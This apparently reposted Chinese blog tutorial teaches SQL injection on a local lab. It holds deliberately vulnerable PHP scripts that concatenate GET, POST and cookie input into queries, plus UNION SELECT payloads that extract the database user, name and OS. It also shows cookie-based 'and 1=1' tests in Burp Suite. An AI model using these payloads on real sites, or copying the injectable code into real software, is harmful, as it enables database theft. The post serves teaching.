参数注入类型与提交方式注入

最新推荐文章于 2022-10-10 16:34:36 发布
最新推荐文章于 2022-10-10 16:34:36 发布
阅读量136 收藏
点赞数
文章标签: php 数据库 xhtml
原文链接:http://www.cnblogs.com/hyit/articles/5351324.html
版权

一、参数类型注入 

(思路:闭合检测符号即从做至右第二次出现的符号可闭合第一次出现的符号)

字符,数字,搜索型

搜索注入一般产生在搜索栏

区别注入原因:sql语句组合中,符号的问题

select * from user where id=4 //数字型注入sql语句

select * from user where username=’fanke’ //字符型注入sql语句

select * from user where password like '%$pass%' order by password;

 

字符:

<?
//$id = $_GET['x'];
$user = $_GET['u'];

$conn = mysql_connect('127.0.0.1','root','root');
mysql_select_db('fanke',$conn);
//$sql = "select * from user where id=$id";
$sql = "select * from user where username='$user'";

$result = mysql_query($sql);
while($row = mysql_fetch_array($result)){
    echo "用户ID: ".$row['id']."<br>";
    echo "用户名: ".$row['username']."<br>";
    echo "用户密码: ".$row['password']."<br>";
}

mysql_close($conn);
echo "<hr>";
echo "你当前执行的sql语句为: ";
echo $sql;
View Code

http://127.0.0.1/php.php?u=fanke 

用户ID: 4
用户名: fanke
用户密码: fanke

你当前执行的sql语句为: select * from user where username='fanke'

 

http://127.0.0.1/php.php?u=fanke order by 5

你当前执行的sql语句为: select * from user where username='fanke order by 5'

 

http://127.0.0.1/php.php?u=fanke' UNION SELECT 1,2,3,4,5'

 用户ID: 4
用户名: fanke
用户密码: fanke
用户ID: 1
用户名: 2
用户密码: 3

你 当前执行的sql语句为: select * from user where username='fanke' UNION SELECT 1,2,3,4,5''

 

http://127.0.0.1/php.php?u=fanke' UNION SELECT 1,2,3,4,5,6'

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\WWW\php.php on line 11

你当前执行的sql语句为: select * from user where username='fanke' UNION SELECT 1,2,3,4,5,6''

 

 http://127.0.0.1/php.php?u=fanke' UNION SELECT user(),database(),@@version_compile_os,4,5'

用户ID: 4
用户名: fanke
用户密码: fanke
用户ID: root@localhost
用户名: fanke
用户密码: Win32

你当前执行的sql语句为: select * from user where username='fanke' UNION SELECT user(),database(),@@version_compile_os,4,5''

 

搜索型

<?
$name=$_GET['n'];
$pass=$_GET['p'];

$conn=mysql_connect("127.0.0.1","root","123456");//连接mysql数据库
if($conn){
    echo "ok!"; 
}//判断连接是否成功
mysql_select_db('fanke',$conn);//选择连接请求为conn的数据库(fanke)
//$sql="select * from user where username='$name'"; //字符型搜索语句
$sql1="select * from user where password like '%$pass%' order by password";//搜索型注入sql语句
//$result=mysql_query($sql);
$result1=mysql_query($sql1);

/*while($row = mysql_fetch_array($result)){ 
    echo "用户ID:".$row['id']."<br >";
    echo "用户名:".$row['username']."<br >";
    echo "用户密码:".$row['password']."<br >";
    echo "用户邮箱:".$row['email']."<br >";
}*/

while($row = mysql_fetch_array($result1)){ 
    echo "用户ID:".$row['id']."<br >";
    echo "用户名:".$row['username']."<br >";
    echo "用户密码:".$row['password']."<br >";
    echo "用户邮箱:".$row['email']."<br >";
}

mysql_close($conn); //关闭数据库连接
echo "<hr>";
echo "你当前执行的sql语句为:";
//echo "select * from user where username='$name'";
echo $sql1;
?>
View Code

http://127.0.0.1/php.php?p=f 

用户ID: 6
用户名: fanke4
用户密码: fank
用户ID: 4
用户名: fanke
用户密码: fanke
用户ID: 5
用户名: fanke2
用户密码: fanke

你当前执行的sql语句为: select * from user where password like '%f%' order by password

http://127.0.0.1/php.php?p=f%' UNION SELECT 1,2,3,4,5'

用户ID: 1
用户名: 2
用户密码: 3
用户ID: 6
用户名: fanke4
用户密码: fank
用 户ID: 4
用户名: fanke
用户密码: fanke
用户ID: 5
用户名: fanke2
用户密码: fanke

你当前执行的sql语句为: select * from user where password like '%f%' UNION SELECT 1,2,3,4,5'%' order by password

二、提交方式注入

GET(一般)POST(表单)COOKIE(包含GET和POST)绕过URL检测

get是从服务器上获取数据,post是向服务器传送数据

cookie盗取 session劫持区别(用户凭据):cookie用于保存账号和密码,还可以通过cookie注入突破简单的防注入(第三方防注入程序一般只过滤get post的参数)

Cookie存储方式:本地端,存活时间可长可短,安全性低,对客户端性能有影响(缓存)

Session存储方式:服务端,存活时间一般较短,安全性高,但是客户请求次数频繁则对服务器性能有所影响(连接的建立与断开耗CPU、内存等)

<?php

$name=$_POST['u']; 
$pass=$_POST['p'];
$conn = mysql_connect('127.0.0.1','root','root'); 
if($conn){
    echo "mysql连接成功";
    echo "<hr>";    
}
mysql_select_db('fanke',$conn);  
$sql="select * from user where username='$name' and password='$pass'";
$result=mysql_query($sql);

while($row = mysql_fetch_array($result)){
    echo "用户ID:".$row['id']."<br >";
    echo "用户名:".$row['username']."<br >";
    echo "用户密码:".$row['password']."<br >";
}
echo "当前执行的sql语句:".$sql;
mysql_close($conn);

?>
View Code

 

 

 

密码: 'UNION SELECT user(),database(),@@version_compile_os,4,5'

 

http://127.0.0.1:81/1/1/shownews.asp?id=27

GET /1/1/shownews.asp?id=27 HTTP/1.1

Host: 127.0.0.1:81

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2) Gecko/20100115 Firefox/3.6

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Proxy-Connection: keep-alive

Cookie: VWVRQQKFOYCKBVJXBLTL=XKXHWTTEFFVQLBUQRPLBCDVELBFAIQTJLPVPRVLU

 

 VWVRQQKFOYCKBVJXBLTL=XKXHWTTEFFVQLBUQRPLBCDVELBFAIQTJLPVPRVLU; id=27 and 1=1

Content-Length: 21900

Cookie: VWVRQQKFOYCKBVJXBLTL=XKXHWTTEFFVQLBUQRPLBCDVELBFAIQTJLPVPRVLU; id=27 and 1=2

Content-Length: 7133

结论:正确与错误sql语句的Content-Length不同说明可能存在注入;正确sql语句的Content-Length21900

 

Cookie: VWVRQQKFOYCKBVJXBLTL=XKXHWTTEFFVQLBUQRPLBCDVELBFAIQTJLPVPRVLU; id=27 order by 11

Content-Length: 21900

结论:

流程:打开burpsuite开关,浏览器发出请求,burpsuite拦截这个数据包,forward放出一个数据包后并拦截下一个请求数据包

浏览器经抓包工具拦截下来修改后的数据包发出去后,浏览器会收到response;

浏览器拦截的数据包发到repeater可在左侧对其进行修改,并在repeater右侧收到responce

 

转载于:https://www.cnblogs.com/hyit/articles/5351324.html

dfu65065
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sql漏洞注入之报错注入
Matheus的博客
07-22 857
报错注入 在MYSQL中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。select/insert/update/delete都可以使用报错来获取信息。 报错注入流程: 1)判断是否存在注入点。 2)构造错误的语法制造报错。 3)使用对应的报错函数来获取信息。 常用的报错函数: 基于函数报错的信息获取(select/insert/update/delete) updatexml() updatexml()函数是MYSQL对XML
SpringMVC-请求参数注入-基本类型参数注入源码探讨
wang704987562的博客
08-12 4806
前言 这篇文章分享SringMVC处理请求流程中的一个环节,注入请求参数值,请求参数注入是DispatcherServlet接收并处理请求的流程其中的一个环节,最后选取最基础的参数解析器RequestParamMethodArgumentResolver,了解注入其如何注入基本类型,如int、String等。 Spring Version:5.0.6.RELEASE Spring MVC V...
SQL注入之报错注入的一些随笔
郁离歌丶的博客
03-21 4487
0x00.序言关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()报错注入http:/...
Mybatis的注解方式,一次性注入多个参数需要用@Param
Hpeacheng的博客
11-27 811
【1】今天在做一个多表添加的时候,发现了一个问题,就是明明我写的都是对的,但是web页面就是给我报一个找不到指定参数的情况 可以看到我们的问题是Mybatis出现的,也就是大概率不可能是controller层或者是service层,只能先从dao层寻找答案,但是我通过debug的方式启动服务器,发现service和controller层都可以获得到这个参数,那么问题无疑,就是dao层的sql语句或者参数传错了,就这两行代码,看了半天,都没有找到哪里出错,而且外键关联的表里,也有我需要添加的数据。 .
报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例
热门推荐
wangyuxiang946的博客
03-12 2万+
报错注入怎么使用,报错注入步骤,报错注入原理,报错注入使用。
SQL 登录注入脚本_常见web安全问题,SQL注入、XSS、CSRF,基本原理以及如何防御...
weixin_39774491的博客
11-20 233
1.SQL注入原理:1).SQL命令可查询、插入、更新、删除等,命令的串接。而以分号字元为不同命 令的区别。(原本的作用是用于SubQuery或作为查询、插入、更新、删除……等 的条件式)2).SQL命令对于传入的字符串参数是用单引号字元所包起来。(但连续2个单引 号字元,在SQL资料库中,则视为字串中的一个单引号字元)3).SQL命令中,可以注入注解预防:1).在设计应用程序时,完全使用参数化查...
输入值/表单提交参数过滤有效防止sql注入的方法
10-26
为了防止这种攻击,开发者需要对用户输入进行严格的过滤和验证,这就是输入值/表单提交参数过滤的目的。 在上述代码中,作者提供了一个简单的过滤函数`filter_keyword`,用于移除SQL和PHP文件操作的关键字。这个...
php注入,表单提交值转义的实现详解
10-27
SQL注入是一种常见的攻击方式,攻击者通过在表单提交的数据中插入恶意的SQL代码,以达到非法获取、修改或删除数据库信息的目的。为了防止这种情况,我们需要对用户输入的数据进行转义处理。本文将详细探讨如何在PHP...
SQL注入漏洞全接触.ppt
最新发布
11-15
* SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取攻击者想得到的资料。 二、 SQL注入漏洞的危害 * SQL注入漏洞可能导致敏感数据泄露、服务器被入侵、网站沦陷等严重后果。 * ...
SQL注入攻击与防御
05-18
SQL注入攻击是网络安全领域中一个严重的问题,它发生在应用程序与数据库交互时,攻击者通过输入恶意构造的SQL语句来获取、修改、删除或者控制数据库中的敏感数据。这种攻击方式通常利用了编程代码中对用户输入数据...
SQL注入漏洞
haoge1998的博客
04-15 1129
SQL注入漏洞 1、注入攻击的核心点: 拼接有效的语句或代码 确保完成闭合,并且可以改变原有执行逻辑 2、防护: 从代码和sql语句的逻辑层面考虑,不能轻易让密码对比失效 基于用户输入的引号(单引号和双引号)进行转义处理,可以使用PHP内置函数addslashes进行强制转义。 使用mysqli的预处理功能 一、查询注入的数据类型 注入类型可以分为三类: 1、数字型 select * from tables where id = 1; 2、字符型 select * from tables whe
小迪教程第八天——参数类型注入
仲夏
10-17 288
1、数字型数字不需要注意符号,直接注入即可$sql1="select * from user where id=$int";//定义数字注入sql语句2、字符型sql语句中组合时,字符需要符号扩起$sql2="select * from user where username='$str'";// 定义字符串注入sql语句注入过程: 3、搜索型$sql3="select * from user w
WEB漏洞- 注入类型提交注入
硫酸超的博客
07-28 551
注入类型提交注入前言简要明确参数类型数字字符搜索简要明确请求方式演示 前言 在真实SQL注入安全测试中,我们一定要先明确提交数据及提交方法后再进行注入,其中提交数据类型提交方法可以通过抓包分析获取,后续安全测试中我们也必须满足同等的操作才能进行注入。 简要明确参数类型 数字 如果是数字的话可能不存在单引号 对方在数字上加单引号也是有可能的,要看对方的写法,因为纯数字的话加不加单引号是无所谓的,但还是得看前端的代码里有没有单引号 字符 一般是采用单引号 如果参数是字符的话那肯定是有单引号的 即使有
WEB攻防-通用漏洞&SQL注入-类型&提交方式&盲注
m0_65336233的博客
10-10 651
WEB攻防-通用漏洞&SQL注入-类型&提交方式&盲注
数据库注入学习笔记8---提交方式参数类型注入
qq_41759633的博客
08-08 191
引:HTTP 定义了与服务器交互的不同方法,最基本的方法是 GET 和 POST(Ajax开发,关心的只有GET请求和POST请求)。 GET与POST方法有以下区别: (1) 在客户端,Get方式在通过URL提交数据,数据在URL中可以看到;POST方式,数据放置在HTML HEADER内提交。 (2) GET方式提交的数据最多只能有1024字节,而POST则没有此限制。 (3) 安全性问题。正...
SQL注入之——分类及提交方式
温柔小薛的博客
04-01 1063
攻击分类及提交方式 注入前的准备与注入漏洞检测 在进行 SQL 注入攻击时,需要利用到从服务器返回的各种出错信息,默认设置是不显示详细错误返回信息的,因此首先要取消 IE 浏览器返回信息设置,以便查看到注入攻击时返回的数据库信息 将浏览器设置选项高级 显示取消友好 HTTP 错误信息 手工检测 SQL 注入点 最常用的 SQL 注入点判断方法,是在网站中寻找如下形式的网页链接。 htt...
系列2:6、sql注入之数据类型提交方式
qq_44704184的博客
03-30 1929
一、 数据类型 1、数字型注入点人。 许多网页链接有类似的结构http://xox.com/users.php?id=1基于此种形式的注入,一般被叫做数字型注入点,缘由是其注入点 id类型为数字,在大多数的网页中,诸如查看用户个人信息,查看文章等,大都会使用这种形式的结构传递id等信息,交给后端,查询出数据库中对应的信息,返回给前台。这一类的SQL语句原型大概为 select * from表名 where id=1若存在注入,我们可以构造出类似与如下的sq注入语句进行爆破: select * from表名w
简单的sql手工注入过程
weixin_52242569的博客
09-25 2870
sql手工注入过程判断注入点判断注入类型判断注入提交方式使用order by 查询字段使用联合查询来查询当前数据库、用户、版本信息查询当前数据库中的表,列和值 判断注入点 1.单引号法:直接在网址后面加一个单引号,如果页面不能正常显示,浏览器返回一些异常信息,则说明该链接可能存在sql注入漏洞 2.1=1和1=2:在网址后面的get传参中加上 and 1=1 ,显示正常,把1=1替换为1=2,显示异常,说明网页存在sql注入。 判断注入类型 1.数字型注入注入变量的值不需要用引号引起来,如 select
Form表单、四种常见的POST请求提交数据方式、MIME【转】
weixin_30887919的博客
01-26 8434
浏览器行为:Form表单提交 1、form表单常用属性 action:url 地址,服务器接收表单数据的地址 method:提交服务器的http方法,一般为post和get name:最好好吃name属性的唯一性 enctype: 表单数据提交时使用的编码类型,默认使用"pplication/x-www-form-urlencoded",如果是使用POST请求,则请求头中的conte...
命令注入讲解ppt.pptx
08-10
与远程代码执行(RCE)不同,命令注入专注于操作系统命令,而非编程代码。此漏洞主要由未过滤的用户输入和使用危险函数如system、eval、exec等导致。" 命令注入是一种网络安全问题,其基本原理在于攻击者能够通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值